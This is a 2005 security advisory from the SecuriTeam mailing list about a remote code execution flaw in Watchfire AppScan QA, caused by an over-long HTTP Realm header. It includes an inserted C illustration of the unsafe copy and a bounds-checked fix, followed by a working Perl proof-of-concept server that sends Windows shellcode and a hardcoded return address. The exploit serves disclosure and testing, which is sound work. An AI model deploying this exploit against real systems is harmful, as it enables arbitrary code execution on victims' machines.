[NT] Watchfire AppScan QA Remote Code Execution

Subject: [NT] Watchfire AppScan QA Remote Code Execution
Date: 18 Dec 2005 08:41:23 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com



  Watchfire AppScan QA Remote Code Execution
------------------------------------------------------------------------


SUMMARY

AppScan QA is "an automated web application testing tool that provides QA 
personnel with security defect analysis and remediation information. 
Instead of manually searching for security defects, application testers 
trust AppScan QA to detect security defects and vulnerabilities 
automatically as an integrated component of enterprise development and 
testing processes. AppScan QA automates test script creation, 
modification, and maintenance to ensure reliable and repeatable testing". 
A vulnerability within Watchfire's AppScan allows remote attackers to 
cause the product to execute arbitrary code by overflowing its internal 
buffer used to store the HTTP response's Realm field.

DETAILS

Vulnerable Systems:
 * AppScan QA  version 5.0.609 / Subscription 7
 * AppScan QA  version 5.0.134

Immune Systems:
 * AppScan QA  version 5.0.609 / Subscription 8

The vulnerability specifically exists in the way AppScan QA processes 401 
HTTP responses. If a custom 401 response is specially crafted, containing 
a WWW-Authenticate header with the Realm field consisting of more than 351 
characters, a buffer overflow occurs, leading to remote code execution 
with the privileges of the user running AppScan QA.
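The defect class described above (an HTTP client copying an attacker-controlled realm value into a fixed-size buffer) is easy to model. The following C program is an added illustration, not AppScan's code and not the advisory's PoC: it assumes a hypothetical 352-byte realm buffer (351 characters plus the terminator, matching the advisory's threshold), shows the unchecked copy beside a bounds-checked version that rejects over-long realms, and includes a length check that a proxy or IDS could apply to 401 responses. The header lines it parses are constructed inline.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical fixed-size realm buffer. The advisory says realms longer than
   351 characters trigger the overflow, so this model holds 351 characters
   plus the NUL terminator. Constructed illustration, not AppScan's code. */
#define REALM_BUF 352

/* Locate the quoted realm value in a WWW-Authenticate header line.
   Returns 0 and sets *start/*len (value without quotes), or -1 if no
   well-formed realm="..." is present. */
static int find_realm(const char *header, const char **start, size_t *len)
{
    const char *p = strstr(header, "realm=\"");
    if (p == NULL) return -1;
    p += strlen("realm=\"");
    const char *end = strchr(p, '"');
    if (end == NULL) return -1;
    *start = p;
    *len = (size_t)(end - p);
    return 0;
}

/* Vulnerable pattern: the realm is copied into a fixed buffer with no length
   check, so any realm of REALM_BUF or more characters writes past the end.
   Returns the copied length; only ever call it with short input. */
size_t copy_realm_unchecked(const char *header)
{
    char realm[REALM_BUF];
    const char *start;
    size_t len;
    if (find_realm(header, &start, &len) != 0) return 0;
    memcpy(realm, start, len);   /* len is attacker-controlled and unbounded */
    realm[len] = '\0';
    return strlen(realm);
}

/* Hardened form: the caller supplies the buffer and its size; over-long
   realms are rejected (-2) rather than truncated or copied blindly.
   Returns 0 on success, -1 if the header is malformed. */
int copy_realm_checked(const char *header, char *out, size_t outlen)
{
    const char *start;
    size_t len;
    if (find_realm(header, &start, &len) != 0) return -1;
    if (len >= outlen) return -2;          /* leave room for the NUL */
    memcpy(out, start, len);
    out[len] = '\0';
    return 0;
}

/* Detection helper for a proxy or IDS: 1 if the header carries a realm longer
   than `limit` characters, 0 otherwise (malformed headers count as 0). */
int realm_exceeds_limit(const char *header, size_t limit)
{
    const char *start;
    size_t len;
    if (find_realm(header, &start, &len) != 0) return 0;
    return len > limit;
}

/* Build a constructed WWW-Authenticate line whose realm is `n` 'A's.
   Returns 0 on success, -1 if buf is too small. */
int make_auth_header(size_t n, char *buf, size_t buflen)
{
    const char *pre = "WWW-Authenticate: Basic realm=\"";
    if (strlen(pre) + n + 2 > buflen) return -1;   /* pre + n + '"' + NUL */
    size_t off = (size_t)sprintf(buf, "%s", pre);
    memset(buf + off, 'A', n);
    off += n;
    buf[off++] = '"';
    buf[off] = '\0';
    return 0;
}

/* Wrapper: result of the checked copy for a constructed realm of length n
   into the REALM_BUF-sized buffer (-99 if the header could not be built). */
int checked_result_for_realm_len(size_t n)
{
    char hdr[1024], realm[REALM_BUF];
    if (make_auth_header(n, hdr, sizeof hdr) != 0) return -99;
    return copy_realm_checked(hdr, realm, sizeof realm);
}

int main(void)
{
    char hdr[1024];
    make_auth_header(400, hdr, sizeof hdr);   /* 400 > 351: past the advisory's threshold */
    printf("checked copy of 400-char realm: %d\n", checked_result_for_realm_len(400));
    printf("realm exceeds 351 chars: %d\n", realm_exceeds_limit(hdr, 351));
    printf("checked copy of 351-char realm: %d\n", checked_result_for_realm_len(351));
    return 0;
}
```

The boundary matches the advisory: a 351-character realm fits and is accepted, a 352-character one is rejected with -2, and `realm_exceeds_limit` flags the same responses the overflow would have triggered, which is the check an inspecting proxy would apply to traffic from untrusted servers.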

Vendor Response:
 * 10/12/2005: Initial Vendor Contact.
 * 10/18/2005: Vendor Confirmed Vulnerability.
 * 11/02/2005: Vendor Releases Update.
 * 12/15/2005: Advisory Public Disclosure.

Exploit:
#!/usr/bin/perl -w
#
# Watchfire AppScan QA PoC - Coded by Mariano Nuñez Di Croce @ CYBSEC
#
# How to use:
# 1. Run this script to set up the fake web server.
# 2. Scan the server with AppScan QA, either in Interactive or Manual mode.
# 3. If you get a "You are vulnerable!" popup, you should upgrade immediately.
#
# PoC developed for Windows 2000 Server SP4.
#

use IO::Socket::INET;

# Disable output buffering
$| = 1;

# Define the 200 OK response (its body links to the protected /admin resource)
my $res200 = "HTTP/1.1 200 OK\r\nHost: www.test.com\r\nDate: Thu, 01 Nov 2005 14:38:20 GMT\r\nServer: Apache\r\nContent-Length: 26\r\n" .
    "Keep-Alive: timeout=15, max=100\r\nConnection: Close\r\n" .
    "Content-Type: text/html; charset=ISO-8859-1\r\n\r\n<a href='/admin'>admin</a>";

# Define the 401 Authorization Required header and tail; the realm value goes between them
my $res401Head = "HTTP/1.1 401 Authorization Required\r\nHost: www.test.com\r\nDate: Thu, 01 Nov 2005 14:43:53 GMT\r\n" .
    "Server: Apache\r\nWWW-Authenticate: Basic realm=\"";

my $res401Tail = "Content-Length: 401\r\nKeep-Alive: timeout=15, max=100\r\nConnection: Close\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n" .
    "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML2.0//EN\">\r\n<html><head>\r\n<title>401 Authorization Required</title>\r\n</head><body>\r\n" .
    "<h1>Authorization Required</h1>\r\n<p>This server could not verify that you\r\nare authorized to access the document\r\nrequested.  " .
    "Either you supplied the wrong\r\ncredentials (e.g., bad password), or your\r\nbrowser doesn't understand how to supply\r\n" .
    "the credentials required.</p>\r\n</body></html>";

# Ret - call ebx - in user32.dll (Windows 2000 Server SP4)
my $ret = pack("l", 0x77e11627);

# Payload: pops a MessageBoxA reading "You are vulnerable!"
my $scode = "\x31\xd2\xeb\x35\x59\x88\x51\x06\xbb" .
    "\x21\x02\x59\x7c\x51\xff\xd3\xeb" .
    "\x33\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\xab\x0c" .
    "\x59\x7c\xff\xd3\xeb\x33\x59\x31\xd2\x88\x51\x13" .
    "\x52\x51\x51\x52\xff\xd0\x31\xd2\x52\xb8\xbe\x69" .
    "\x59\x7c\xff\xd0\xe8\xc6\xff\xff\xff\x75\x73\x65\x72" .
    "\x33\x32\x4e\xe8\xc8\xff\xff\xff\x4d\x65\x73\x73\x61" .
    "\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc8\xff\xff\xff\x59" .
    "\x6f\x75\x20\x61\x72\x65\x20\x76\x75\x6c\x6e\x65\x72" .
    "\x61\x62\x6c\x65\x21\x4e";

# Realm of 347 filler bytes, a short jump, the return address and the payload
my $resExploit = $res401Head . "\x41" x 347 . "\xeb\x06AA" . $ret . $scode . "\"\r\n" . $res401Tail;

# Initialization of the fake web server
my $srv = IO::Socket::INET->new(LocalPort => 80,
                                Reuse     => 1,
                                Listen    => 1) || die "Could not create socket: $!\n";

print "Waiting for connections...\n";

while (my $cli = $srv->accept()) {
    printf "Request from %s\n", $cli->peerhost;
    while (<$cli>) {
        if (/admin/) {
            # If the request is for "admin", send the crafted 401 response
            print "Request for protected resource detected...launching exploit\n";
            print $cli $resExploit;
        }
        else {
            # Otherwise send a normal response
            print $cli $res200;
        }
    }
    close($cli);
}
close($srv);


ADDITIONAL INFORMATION

The information has been provided by Mariano Nuñez Di Croce <mailto:mnunez@cybsec.com>.
The original article can be found at:
<http://www.cybsec.com/vuln/CYBSEC_Security_Advisory_AppScanQA_RemoteCodeExec.pdf>
CYBSEC Security Advisory AppScanQA RemoteCodeExec (pdf)




DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
